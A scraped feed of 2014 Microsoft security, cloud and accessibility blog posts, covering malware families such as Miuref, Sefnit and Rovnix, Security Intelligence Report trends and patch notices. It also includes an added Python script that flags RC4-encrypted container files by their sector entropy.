For Internet Explorer the redirection is done by injecting code into the Internet Explorer process and obtaining the redirection URLs from a remote server. The malware can also perform click fraud by running additional hidden Internet Explorer processes and sending clicks to online advertisements that appear to come from the pages controlled by the attacker.</p> <p>Miuref also appears to have mechanisms to allow it to update itself, or to download and run other malware.</p> <p>As usual, there are a number of steps you can take to help protect your computer from Miuref and other malware and potentially unwanted software:</p> <ul> <li><a href="http://www.microsoft.com/security/portal/mmpc/help/updateFAQs.aspx">Keep your software up to date</a>, especially Java, Adobe Reader and Flash, and Windows and other Microsoft products.</li> <li>Use caution when opening attachments or links in emails or instant messages, especially if they are suspicious or unexpected.</li> <li>Run an up-to-date real-time antimalware product, such as <a href="http://windows.microsoft.com/en-us/windows/security-essentials-download">Microsoft Security Essentials</a>, or, if you are running Windows 8, ensure that <a href="http://www.microsoft.com/security/pc-security/windows-defender.aspx">Windows Defender</a> is active.</li> </ul> <p><em>David Wood</em></p> <p><em>MMPC</em></p> </div>
Security Trends in Cloud Computing Part 3: Retail sector
http://blogs.technet.com/b/trustworthycomputing/archive/2014/05/13/security-trends-in-cloud-computing-part-3-retail-sector.aspx
Tue, 13 May 2014 15:57:00 GMT
Trusted Cloud Team
<p><strong>By Adrienne Hall, General Manager, Trustworthy Computing</strong></p> <p>Previously in this series, we looked at cloud security trends in the <a href="/b/trustworthycomputing/archive/2014/04/29/security-trends-in-cloud-computing-part-1-financial-services.aspx" target="_blank">financial services</a> and <a href="/b/trustworthycomputing/archive/2014/05/01/security-trends-in-cloud-computing-part-2-addressing-data-challenges-in-healthcare.aspx" target="_blank">healthcare</a> sectors, based on survey data derived from Microsoft&rsquo;s <a href="https://roianalyst.alinean.com/msft/AutoLogin.do?d=563612287085088525" target="_blank">Cloud Security Readiness Tool</a> (CSRT). Next I&rsquo;d like to discuss some findings that relate to the retail industry. <a href="/b/trustworthycomputing/archive/2014/05/12/security-trends-in-cloud-computing-part-3-retail-sector.aspx" target="_blank">Read more &gt;&gt;</a></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/05/13/security-trends-in-cloud-computing-part-3-retail-sector.aspx">read more</a>)
Meet Ryan Asdourian: Microsoft Promoter; Seahawks Mascot; and MS Ambassador
http://blogs.msdn.com/b/accessibility/archive/2014/05/13/meet-ryan-asdourian-microsoft-promoter-seahawks-mascot-and-ms-ambassador.aspx
Tue, 13 May 2014 15:35:00 GMT
Daniel Hubbell - MSFT
Ryan Asdourian stays busy. He travels the world promoting Microsoft products in high-tech demonstrations. When he is back in Seattle he puts on a different type of show as the Seahawks mascot Blitz. 
Then five years ago, the busy tech showman decided...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/05/13/meet-ryan-asdourian-microsoft-promoter-seahawks-mascot-and-ms-ambassador.aspx">read more</a>)
Advance Notification Service for the May 2014 Security Bulletin Release
http://blogs.technet.com/b/msrc/archive/2014/05/08/advance-notification-service-for-the-may-2014-security-bulletin-release.aspx
Thu, 08 May 2014 19:00:00 GMT
Dustin C. Childs
<p>Today we provide Advance Notification Service (ANS) for the release of eight bulletins, two rated Critical and six rated Important in severity. These updates will address vulnerabilities in .NET Framework, Office, Internet Explorer, and Windows.</p> <p>As we do every month, we&rsquo;ve scheduled the security bulletin release for the second Tuesday of the month, May 13, 2014, at approximately 10:00 a.m. PDT. Revisit this blog then for deployment guidance and further analysis, together with a brief video overview of the month&rsquo;s updates. Until then, please review the <a title="ANS summary page" href="http://technet.microsoft.com/security/bulletin/MS14-may">ANS summary page</a> for more information to help you prepare for deployment priorities and security bulletin testing.</p> <p>You can follow us on Twitter. 
The MSRC handle is <a title="@MSFTSecResponse" href="https://twitter.com/msftsecresponse">@MSFTSecResponse</a>.</p> <p>Thank you,<br /> <a href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs">Dustin Childs</a><br /> Group Manager, Response Communications<br /> Microsoft Trustworthy Computing</p>
Get advance notice about May 2014 security updates
http://blogs.msdn.com/b/securitytipstalk/archive/2014/05/08/get-advance-notice-about-may-2014-security-updates.aspx
Thu, 08 May 2014 18:50:00 GMT
Eve Blakemore
<p>Today, the Microsoft Security Response Center (MSRC) posted details about the <a href="http://technet.microsoft.com/en-us/security/bulletin/ms14-may">May security updates</a>.</p> <p>If you have automatic updating turned on, most of these updates will download and install on their own. Sometimes you may need to provide input for Windows Update during an installation. In this case, you'll see an alert in the notification area at the far right of the taskbar; be sure to click it.</p> <p>In Windows 8, Windows turns on automatic updating during setup unless you choose to turn it off. 
To check this setting and turn on automatic updating, open the <a href="http://windows.microsoft.com/en-us/windows-8/charms" target="_blank"><strong>Search charm</strong></a>, enter <strong>Turn automatic updating on or off</strong>, and tap or click <strong>Settings</strong> to find it.</p> <p><a href="http://windows.microsoft.com/en-us/windows7/install-windows-updates">Learn how to install Windows Updates in Windows 7</a>.</p> <p><strong>If you are a technical professional</strong></p> <p>The <a href="http://www.microsoft.com/technet/security/Bulletin/advance.mspx">Microsoft Security Bulletin Advance Notification Service</a> offers details about security updates approximately three business days before they are released. We do this to enable customers (especially IT professionals) to plan for effective deployment of security updates.</p> <p><a title="Sign up for security notifications" href="http://technet.microsoft.com/en-us/security/dd252948">Sign up for security notifications</a></p>
May 15th Is Global Accessibility Awareness Day: Ways to Celebrate Digital Inclusion
http://blogs.msdn.com/b/accessibility/archive/2014/05/08/may-15th-is-global-accessibility-awareness-day-ways-to-celebrate-digital-inclusion.aspx
Thu, 08 May 2014 14:08:00 GMT
Daniel Hubbell - MSFT
The following blog post was written by Paul Nyhan, a staff writer with 
the Microsoft Accessibility Blog. Paul is a 20-year journalism veteran who has written extensively about disability issues. ----- On May 15th we will celebrate Global Accessibility...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/05/08/may-15th-is-global-accessibility-awareness-day-ways-to-celebrate-digital-inclusion.aspx">read more</a>)
New research shows rise in “deceptive downloads”
http://blogs.msdn.com/b/securitytipstalk/archive/2014/05/07/new-research-shows-rise-in-deceptive-downloads.aspx
Wed, 07 May 2014 17:31:00 GMT
Eve Blakemore
<p>According to the latest <a href="http://www.microsoft.com/security/sir/default.aspx">cybersecurity report</a> from Microsoft, &ldquo;deceptive downloads&rdquo; were the top threat for 95 percent of the 110 countries surveyed.</p> <h1>What are deceptive downloads?</h1> <p>Deceptive downloads are legitimate downloadable programs (usually free) such as software, games, or music that cybercriminals bundle with malicious items.</p> <p>For example, you might receive a file in email or through social networking, but when you try to open it you see a message that says you don&rsquo;t have the right software to open it. You do a search online and come across a free software download that claims it can help you open the file. You download that software, but you might unknowingly be downloading malicious software (also known as &ldquo;malware&rdquo;) with it. 
This malware might have the ability to access personal information on your computer or <a href="http://www.microsoft.com/security/resources/botnet-whatis.aspx">use your computer for cybercrime</a>.</p> <p>It could be months or even years before you notice your system has malware.</p> <h1>How can I avoid deceptive downloads?</h1> <ul> <li>Think before you click.</li> <li>Only download software from websites you trust. For more information, see <a href="http://www.microsoft.com/security/online-privacy/trusted-sites.aspx">How do I know if I can trust a website?</a></li> <li><a href="http://www.microsoft.com/security/pc-security/updates.aspx">Turn on automatic updating</a> so that you&rsquo;re always using the latest, most secure versions of the software installed on your computer.</li> <li>Make sure you&rsquo;re using <a href="http://www.microsoft.com/security/resources/antivirus-whatis.aspx">antivirus software</a> and keeping it up to date.</li> <li>Use newer software whenever possible.</li> </ul> <h1>What should I do if I think I&rsquo;ve been a victim of a deceptive download?</h1> <p>Do a scan with your antivirus software. If your computer is running Windows 8 or Windows 8.1, you can use the built-in&nbsp;<a href="http://www.microsoft.com/security/pc-security/windows8.aspx#antivirus">Windows Defender</a>&nbsp;to check for and to help you get rid of a virus or other malware.</p> <p>If your computer is running Windows 7 or Windows Vista, do the following:</p> <ul> <li><a href="http://www.microsoft.com/security/scanner/en-us/default.aspx">Run the Microsoft Safety Scanner</a>. The scanner works with the antivirus software that you already have on your computer, regardless of whether the software is from Microsoft.</li> <li>Download&nbsp;<a href="http://www.microsoft.com/security/resources/mse-whatis.aspx">Microsoft Security Essentials</a>&nbsp;for free, and then use the software to run a scan of your computer. 
For more information, see&nbsp;<a href="http://www.microsoft.com/security/pc-security/microsoft-security-essentials.aspx">Get free virus protection with Microsoft Security Essentials</a>. (<strong>Note:</strong> Some malware will prevent you from downloading Microsoft Security Essentials. If you can&rsquo;t access the Internet to download the software, try <a href="http://windows.microsoft.com/en-us/windows/windows-defender-offline-faq">Windows Defender Offline</a>.)</li> <li>Some malicious software can be difficult to remove. If your antivirus software detects malware but can&rsquo;t remove it,&nbsp;<a href="http://www.microsoft.com/security/portal/mmpc/help/remediation.aspx">follow these steps</a>.</li> </ul> <h1>What is the Security Intelligence Report?</h1> <p>The <a href="http://www.microsoft.com/security/sir/default.aspx">Microsoft Security Intelligence Report (SIR)</a> covers research on computer security, including software vulnerabilities, exploits, and&nbsp;<a href="http://www.microsoft.com/security/resources/malware-whatis.aspx">malicious and potentially unwanted software</a>. Volume 16 of the report was released today. 
If you want to learn more about deceptive downloads and other key findings, please visit <a href="http://www.microsoft.com/sir">Microsoft.com/SIR</a>.</p>
SIRv16: Cybercriminal tactics trend toward deceptive measures
http://blogs.technet.com/b/mmpc/archive/2014/05/07/sirv16-cybercriminal-tactics-trend-toward-deceptive-measures.aspx
Wed, 07 May 2014 13:01:00 GMT
msft-mmpc
<div class="ExternalClassEB60DAC428954EBFBA2F90AC6968EC2F"> <p>Microsoft&rsquo;s <a href="http://www.microsoft.com/security/sir/default.aspx">Security Intelligence Report volume 16</a> (SIRv16) was released today, providing threat trends on malware encounter rates, infection rates, vulnerabilities, exploits, and more for 110 countries/regions worldwide. The report is designed to help IT and security professionals better protect themselves and their organizations from cyberattacks.</p> <p>Malware data is gathered from the <a href="http://www.microsoft.com/security/pc-security/malware-removal.aspx">Malicious Software Removal Tool</a> (MSRT), which is used to calculate the infection rate (<a href="http://www.microsoft.com/security/sir/glossary.aspx#C">Computers Cleaned per Mille</a>, CCM), and our real-time protection products are used to derive the <a href="http://www.microsoft.com/security/sir/glossary.aspx#E">encounter rate</a>. One of the more notable findings in the report was an increase in worldwide infection rates and encounter rates. About 21.2 percent of reporting computers encountered malware each quarter in 2013. 
We also saw an infection rate of 11.7 CCM.</p> <p>More specifically, the infection rate increased from 5.6 CCM in the third quarter of 2013 to 17.8 in the fourth, a threefold increase and the largest infection rate increase ever measured by the MSRT between two consecutive quarters. This rise was driven predominantly by malware <a href="http://blogs.technet.com/b/security/archive/2014/05/07/new-data-sheds-light-on-shift-in-cybercriminal-tactics.aspx">using deceptive tactics</a>, in particular three families familiar to readers of this blog: <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Sefnit">Sefnit</a> and its related families <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Rotbrow">Rotbrow</a> and <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Brantall">Brantall</a>.</p> <p>Sefnit, a bot which gives a remote attacker a multitude of options, is often used in connection with activities that help attackers make money, such as click fraud and Bitcoin mining. In fact, Sefnit was first detected because it was performing click hijacking, and users reported seeing their searches redirected. Researchers widely believed the Sefnit threat had diminished; it didn&rsquo;t re-emerge until it started to behave differently, acting like a proxy service and giving attackers the ability to use a botnet of Sefnit-hosted proxies to relay web traffic issuing illegitimate &ldquo;clicks&rdquo; for online ads.</p> <p>These new Sefnit variants operated in the background, evading detection by researchers for a short while. Rotbrow, software that poses as protection from browser plug-ins (&ldquo;Browser Protector&rdquo;), and Brantall, which fronts as an installer for some legitimate software programs, were both caught directly installing Sefnit in the second half of the year. 
Once detection was added, Sefnit became the third most commonly encountered malware family in the third quarter of 2013, dropping down as detections for Rotbrow and Brantall were added to Microsoft security products.</p> <p>Once Rotbrow was added to MSRT it went to the top of the charts as the number one threat encountered and cleaned globally in the second half of 2013. In the fourth quarter, Rotbrow was the most commonly encountered malware family, with an encounter rate of 5.90 percent.</p> <p>Brantall followed as the next most commonly encountered threat, with an encounter rate of 3.55 percent in that same quarter.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/sir16b.png"> <img width="500" alt="2013 encounter rates" src="http://www.microsoft.com/security/portal/blog-images/a/sir16b.png" border="0" /></a></p> <p><em>Figure 1: 2013 encounter rates for major threat families in the second half of 2013</em></p> <p>However, deceptive techniques are not limited to these three families.</p> <p>Ransomware is another type of deceptive tactic that is less prevalent but can be devastating to owners of infected systems.</p> <p>In threat families such as <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Reveton">Reveton</a>, <a href="http://www.microsoft.com/en-us/search/results.aspx?q=Urausy+site:http://www.microsoft.com/security/portal">Urausy</a>, or the highly publicized <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/search.aspx?query=Crilock">Crilock</a> (also known as Cryptolocker), cybercriminals gain control of a user&rsquo;s computer and lock them out of their own files, holding the files for ransom and refusing to return control of the computer or the files until the victim pays a fee. In many instances, control of the computer or files is never returned to the victim, causing them to lose valuable data, pictures, movies, music, etc. 
Certain cases of ransomware, where local or national &quot;authorities&quot; appeared to warn of an alleged crime committed by the computer user and demand a &quot;fine&quot;, were extremely threatening. Many users were so threatened by the fake warnings that they felt they had no choice but to pay the fee. Between the first and second halves of 2013, the top ransomware threat encountered globally, Reveton, increased by 45 percent.</p> <p>While there was an increase in deceptive tactics, interestingly, there was a decrease in exploits.</p> <p>In the second half of 2013, exploits&mdash;particularly Java exploits and web-based threats&mdash;declined between the first and second halves of the year. As always, malicious hackers work to vary what they focus on exploiting, ultimately engaging us in a game of whack-a-mole. First, a decline in web-based threats was seen, followed by a drop in Java exploits.&nbsp; Some of this decline correlated with the discovery and subsequent <a href="http://www.bbc.com/news/technology-24456988">arrest of alleged exploit kit author Paunch</a>, and some of it might have been associated with exploit kit writers varying the exploits they use in their popular kits. You can find more data on exploits and how they trended in SIRv16.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/sir16a.png"> <img style="width:500px;height:281px;" alt="2013 exploit encounter rates" src="http://www.microsoft.com/security/portal/blog-images/a/sir16a.png" border="0" /></a> &nbsp;&nbsp; <br /><em>Figure 2: 2013 exploit encounter rates &nbsp;&nbsp; </em></p> <p>In SIRv16, the Trustworthy Computing security science team has elaborated on exploit trends in its in-depth study of exploits of vulnerabilities in Microsoft products. 
Markedly, they have identified a 70 percent decline in the number of severe vulnerabilities (those that can enable remote code execution) exploited in Microsoft products between 2010 and 2013.</p> <p>As always, the best protection from malware and potentially unwanted software is to <a href="http://www.microsoft.com/security/portal/mmpc/help/updateFAQs.aspx">keep all your software up-to-date</a> and run a real-time security product such as <a href="http://windows.microsoft.com/en-au/windows/security-essentials-download">Microsoft Security Essentials</a>.</p> <p>Additional data on deceptive threats, as well as much more regional-, platform- and category-specific analysis, is available now in Volume 16, which you can download at <a href="http://www.microsoft.com/sir">www.microsoft.com/sir</a>.</p> <p><em>MMPC</em></p> </div>
<p><strong>New Data Sheds Light on Shifting Cybercriminal Tactics</strong><br />Tim Rains, Microsoft, Wed, 07 May 2014 13:00:00 GMT (<a href="http://blogs.technet.com/b/security/archive/2014/05/07/new-data-sheds-light-on-shift-in-cybercriminal-tactics.aspx">original post</a>)</p>
<p>New data released today suggests that the security mitigations Microsoft has included in newer software have helped make malicious cyber acts more difficult for would-be attackers. Effective security mitigations raise the cost of doing business for cybercriminals. The data also indicates that cybercriminals are increasingly utilizing deceptive tactics in their attempts to compromise systems.</p> <p>This is a key finding of our latest <a href="http://www.microsoft.com/sir">cybersecurity report</a>, which we publish twice a year to help our customers, partners, and the broader cybersecurity community understand the tools, tactics and threats posed by cybercriminals. This knowledge is essential for IT and security professionals trying to better protect themselves and their organizations from cyber-attacks.</p> <p>New research conducted by Trustworthy Computing&rsquo;s Security Science team shows a <strong>70 percent decline</strong> in the number of severe vulnerabilities (those that can enable remote code execution) that were exploited in Microsoft products between 2010 and 2013. This is a clear indication that newer products are providing better protection, even in cases where vulnerabilities exist. While this trend is promising, cybercriminals aren&rsquo;t giving up. Our data shows that in the second half of 2013 there was a noticeable increase in cybercriminal activity where attackers used deceptive practices. The continued increase in deceptive tactics is striking; in the last quarter of 2013, the number of computers impacted as a result of deceptive tactics <strong>more than tripled</strong>. The security mitigations included in newer Microsoft products have raised the technical bar for would-be attackers, which may be one of the factors driving an increase in the use of deceptive tactics. (<a href="http://blogs.technet.com/b/security/archive/2014/05/07/new-data-sheds-light-on-shift-in-cybercriminal-tactics.aspx">read more</a>)</p>
<p><strong>Updated Cybersecurity Papers on Supply Chain Security and Critical Infrastructure Protection</strong><br />Microsoft Security Staff, Tue, 06 May 2014 17:55:00 GMT (<a href="http://blogs.technet.com/b/security/archive/2014/05/06/revised-cybersecurity-papers-on-supply-chain-security-and-critical-infrastructure-protection.aspx">original post</a>)</p>
<p>Posted by: <strong>Kevin Sullivan</strong>, Principal Security Strategist, Trustworthy Computing</p> <p>Today we&rsquo;re releasing updated versions of two popular white papers on software supply chain security and critical infrastructure protection. These papers draw on our policies and practices that involve regular assessments of the security challenges facing our customers and our operations, as well as ongoing learnings gained through our experiences defending more than one billion users from cyber-threats. We are pleased to share our learnings on these two critical security topics. (<a href="http://blogs.technet.com/b/security/archive/2014/05/06/revised-cybersecurity-papers-on-supply-chain-security-and-critical-infrastructure-protection.aspx">read more</a>)</p>
<p><strong>United Nations Convention Opens a New Era of Disability Policies around the World</strong><br />Daniel Hubbell - MSFT, Tue, 06 May 2014 16:26:00 GMT (<a href="http://blogs.msdn.com/b/accessibility/archive/2014/05/06/united-nations-convention-opens-a-new-era-of-disability-policies-around-the-world.aspx">original post</a>)</p>
<p><em>Microsoft Plays a Key Role Helping Countries Apply Convention in IT Arena</em></p> <p>Ecuador&rsquo;s Ambassador to the United Nations, Luis Gallegos, was an architect of the landmark Convention on Rights for Persons with Disabilities (CRPD), and remains a tireless...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/05/06/united-nations-convention-opens-a-new-era-of-disability-policies-around-the-world.aspx">read more</a>)</p>
<p><strong>The evolution of Rovnix: new Virtual File System (VFS)</strong><br />msft-mmpc, Tue, 06 May 2014 01:54:52 GMT (<a href="http://blogs.technet.com/b/mmpc/archive/2014/05/05/the-evolution-of-rovnix-new-virtual-file-system-vfs.aspx">original post</a>)</p>
<div class="ExternalClassD4B7402F1AD04EC3942124868AA5FA3D"> <p>Last July, we published a blog about <a href="http://blogs.technet.com/b/mmpc/archive/2013/07/25/the-evolution-of-ronvix-private-tcp-ip-stacks.aspx">Rovnix&rsquo;s private TCP/IP stack</a>.</p> <p>We recently discovered another evolution in Rovnix &ndash; a variant that introduces a new Virtual File System (VFS).</p> <p>With our latest signature update we detect this Rovnix dropper as <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=TrojanDropper%3aWin32%2fRovnix.L">TrojanDropper:Win32/Rovnix.L</a> and the infected VBR (Volume Boot Record) as <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Virus%3aDOS%2fRovnix.gen!A">Virus:DOS/Rovnix.gen!A</a>.</p> <p>Unlike older Rovnix variants, which store their components as raw disk sectors at the end of the disk, TrojanDropper:Win32/Rovnix.L stores its components in a binary file: <em>%system32%\&lt;hex&gt;.bin</em>. Note that this file won&rsquo;t normally be accessed (see figure 1). This VFS uses RC4 to encrypt the stored data at the disk sector level (see figures 2a and 2b).</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Rov1b.png"><img alt="VFS binary" src="http://www.microsoft.com/security/portal/blog-images/a/Rov1b.png" border="0" /></a></p> <p><em>Figure 1: TrojanDropper:Win32/Rovnix.L VFS binary file</em></p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Rov2a.png"><img width="500" alt="RC4 encryption" src="http://www.microsoft.com/security/portal/blog-images/a/Rov2a.png" border="0" /></a></p> <p><em>Figure 2a: RC4 encrypted disk sector data stored in VFS</em></p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Rov2b.png"><img width="500" alt="Plain text data" src="http://www.microsoft.com/security/portal/blog-images/a/Rov2b.png" border="0" /></a></p> <p><em>Figure 2b: Plain text disk sector data</em></p> <p>To prevent this file from being accessed, TrojanDropper:Win32/Rovnix.L installs a mini-filter and also hooks kernel APIs (e.g. NtCreateFile() and NtDeleteFile()) to protect this file.</p> <p>This new variant also contains user-mode bot code, which uses the VFS to store data such as keylogs and stolen passwords (see figure 3).</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Rov3.png"><img width="500" alt="VFS data storage" src="http://www.microsoft.com/security/portal/blog-images/a/Rov3.png" border="0" /></a></p> <p><em>Figure 3: (Rovnix variant) uses VFS to store stolen data</em></p> <p>Clearly, this is another step in Rovnix&rsquo;s evolution for stealth and reliability purposes. This VFS can be used not only for storing Rovnix&rsquo;s components; it can also be accessed from the user-mode component (the bot) for data storage.</p> <p>Fortunately, this new variant doesn&rsquo;t pose any more of a challenge for detection and remediation. As always, the best way to stay protected is with an up-to-date real-time security product such as <a href="http://windows.microsoft.com/en-us/windows/security-essentials-download">Microsoft Security Essentials</a> or <a href="http://www.microsoft.com/security/pc-security/windows-defender.aspx">Windows Defender</a>.</p> <p><em>Chun Feng</em><br /><em>MMPC</em></p> <p>Sha1: bac0cceeacfe2b91b05a961621f5cdd9323f0163</p> </div>
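<p>Added example, not MMPC code: the post contrasts an RC4-encrypted sector (figure 2a) with its plaintext (figure 2b), and that contrast is something an analyst can measure. The script below computes Shannon entropy per 512-byte sector of a candidate container file and flags a file whose sectors are almost all near the 8 bits/byte that stream-cipher output produces. The RC4 routine is only there to build the constructed sample in memory; the key, the sample text and the 7.0 threshold are assumptions for the demo, and nothing here reproduces Rovnix's own file format.</p>

```python
"""Per-sector entropy triage for a suspected encrypted container file.

Added example for this page (not MMPC code). RC4 output is close to uniform,
so a container whose sectors are all near 8 bits/byte looks nothing like the
plaintext sector in figure 2b. Key, sample data and threshold are assumptions.
"""
import math
from collections import Counter
from typing import List

SECTOR_SIZE = 512  # standard disk sector; the post says encryption is per sector


def rc4_keystream_xor(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA). Used here only to build the constructed sample;
    the same call decrypts, since it just XORs the keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte: 0.0 for constant data, approaching 8.0 for uniform data."""
    n = len(buf)
    if n == 0:
        return 0.0
    return -sum((c / n) * math.log2(c / n) for c in Counter(buf).values())


def sector_entropies(image: bytes, sector_size: int = SECTOR_SIZE) -> List[float]:
    """Entropy of every full sector; a trailing partial sector is ignored."""
    return [shannon_entropy(image[off:off + sector_size])
            for off in range(0, len(image) - sector_size + 1, sector_size)]


def looks_sector_encrypted(image: bytes, threshold: float = 7.0,
                           min_fraction: float = 0.9) -> bool:
    """True when at least min_fraction of the sectors exceed the threshold.

    With 512-byte sectors the plug-in entropy estimate of uniform bytes sits
    around 7.6 bits (it is biased low at this sample size); ASCII text, code
    and zero-padded sectors stay well under 7.0."""
    ents = sector_entropies(image)
    if not ents:
        return False
    high = sum(1 for e in ents if e >= threshold)
    return high / len(ents) >= min_fraction


# Constructed sample (not real Rovnix data): eight sectors of plaintext and the
# same sectors after RC4 with a throwaway key, mirroring figures 2b and 2a.
PLAINTEXT_IMAGE = (b"sector payload: constructed configuration text for the demo\r\n"
                   * 100)[:SECTOR_SIZE * 8]
DEMO_KEY = b"constructed-demo-key"
ENCRYPTED_IMAGE = rc4_keystream_xor(DEMO_KEY, PLAINTEXT_IMAGE)


def triage_report(image: bytes) -> dict:
    """Summary a scanner would log for one candidate file."""
    ents = sector_entropies(image)
    return {
        "sectors": len(ents),
        "min_entropy": round(min(ents), 2) if ents else 0.0,
        "max_entropy": round(max(ents), 2) if ents else 0.0,
        "flagged": looks_sector_encrypted(image),
    }


if __name__ == "__main__":
    print("plaintext  :", triage_report(PLAINTEXT_IMAGE))
    print("rc4 sectors:", triage_report(ENCRYPTED_IMAGE))
```

<p>Run it against a copy of the suspect file taken from an offline disk image or a clean boot rather than the live system: the post notes that the dropper hooks NtCreateFile() and NtDeleteFile() and installs a mini-filter to keep the file from being accessed. High entropy alone is only a triage signal, since compressed and legitimately encrypted files score the same; it narrows down what to hand to a full scan.</p>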
<p><strong>Ai Squared and GW Micro Merge. New Company will continue to develop and support the Window-Eyes for Office Offer</strong><br />Daniel Hubbell - MSFT, Thu, 01 May 2014 23:28:59 GMT (<a href="http://blogs.msdn.com/b/accessibility/archive/2014/05/01/ai-squared-and-gw-micro-merge-new-company-will-continue-to-develop-and-support-the-window-eyes-for-office-offer.aspx">original post</a>)</p>
<p>Two leaders in assistive technology for vision-impaired users, Ai Squared and GW Micro, are merging, and the new company will continue providing the Window-Eyes screen reader. The merger combines the maker of the screen magnifier Zoom Text, Ai Squared...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/05/01/ai-squared-and-gw-micro-merge-new-company-will-continue-to-develop-and-support-the-window-eyes-for-office-offer.aspx">read more</a>)</p>
<p><strong>Available now: Security update for Internet Explorer</strong><br />Eve Blakemore, Thu, 01 May 2014 17:10:00 GMT (<a href="http://blogs.msdn.com/b/securitytipstalk/archive/2014/05/01/available-now-security-update-for-internet-explorer.aspx">original post</a>)</p>
<p>Today, Microsoft released a security update for Internet Explorer that we <a href="http://blogs.msdn.com/b/securitytipstalk/archive/2014/04/28/guidance-for-internet-explorer-vulnerability.aspx">blogged about earlier this week</a>.</p> <p>You probably already have automatic updates enabled and will not need to take any action. The update will be downloaded and installed automatically.
If you&rsquo;re unsure if you have automatic updates, or if you haven't already enabled <a href="http://windows.microsoft.com/en-US/windows/help/windows-update">automatic updating</a>, now is the time.</p> <p>Windows XP is no longer supported by Microsoft, however, we decided to issue a security update for our Windows XP customers. We continue to encourage our customers to upgrade to a modern operating system, such as Windows 7 or 8.1 and use Internet Explorer 11, the latest version of our web browser.</p> <p>We&nbsp;encourage you&nbsp;to take steps that protect your computer such as enabling a <a href="http://www.microsoft.com/security/pc-security/firewalls-whatis.aspx">firewall</a>, applying all <a href="http://windows.microsoft.com/en-us/windows-8/windows-update-faq">software updates</a>, and installing <a href="http://www.microsoft.com/security/resources/antivirus-whatis.aspx">antivirus</a> and <a href="http://www.microsoft.com/security/resources/antispyware-whatis.aspx">antispyware software</a>.</p> <p><a href="http://www.microsoft.com/security/pc-security/ie.aspx">Stay up-to-date with the latest version of Internet Explorer</a>.</p> <p>For more information, please see the <a href="http://blogs.technet.com/b/microsoft_blog/archive/2014/05/01/updating-internet-explorer-and-driving-security.aspx">Official Microsoft blog</a>.&nbsp;</p><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10521955" width="1" height="1">updatesInternet Explorersecurity updatesautomatic updatingAutomatic UpdatessecurityMicrosoft Security Trends in Cloud Computing Part 2: Addressing data challenges in healthcarehttp://blogs.technet.com/b/trustworthycomputing/archive/2014/05/01/security-trends-in-cloud-computing-part-2-addressing-data-challenges-in-healthcare.aspxThu, 01 May 2014 16:16:55 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:8e41e187-1e67-4c01-8571-f1b5f2a6556eTrusted Cloud Team0<p><strong>By Adrienne Hall, General Manager, Trustworthy 
Computing</strong></p> <p>In <a target="_blank" href="/b/trustworthycomputing/archive/2014/04/29/security-trends-in-cloud-computing-part-1-financial-services.aspx">Part 1 of this series</a>, we looked at survey data from financial services organizations and discussed some potential benefits for those that adopt cloud computing. The data are derived from the <a target="_blank" href="https://roianalyst.alinean.com/msft/AutoLogin.do?d=563612287085088525">Cloud Security Readiness Tool</a> (CSRT), which helps organizations evaluate whether cloud adoption will meet their business needs. In today&rsquo;s post, I want to focus on cloud security trends in the healthcare industry.&nbsp; <a target="_blank" href="/b/trustworthycomputing/archive/2014/04/30/security-trends-in-cloud-computing-part-2-addressing-data-challenges-in-healthcare.aspx">See more&gt;&gt;</a></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/05/01/security-trends-in-cloud-computing-part-2-addressing-data-challenges-in-healthcare.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3628577&AppID=9044&AppType=Weblog&ContentType=0" width="1" height="1">cloud securityCustomersrisk managementRecoveryAdrienne HallReliableCloudReliabilityTrustcustomer perspectiveITTechnologyStandardscloud trust studyCloud Computingcloud servicesTrustworthy Computingpersonal dataDataPrivacyMicrosoft Cloud SolutionsIT Pros Security Update Released to Address Recent Internet Explorer Vulnerability http://blogs.technet.com/b/msrc/archive/2014/05/01/security-update-released-to-address-recent-internet-explorer-vulnerability.aspxThu, 01 May 2014 16:05:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:91b2a534-edc9-4ddb-acc9-23985296c349Dustin C. 
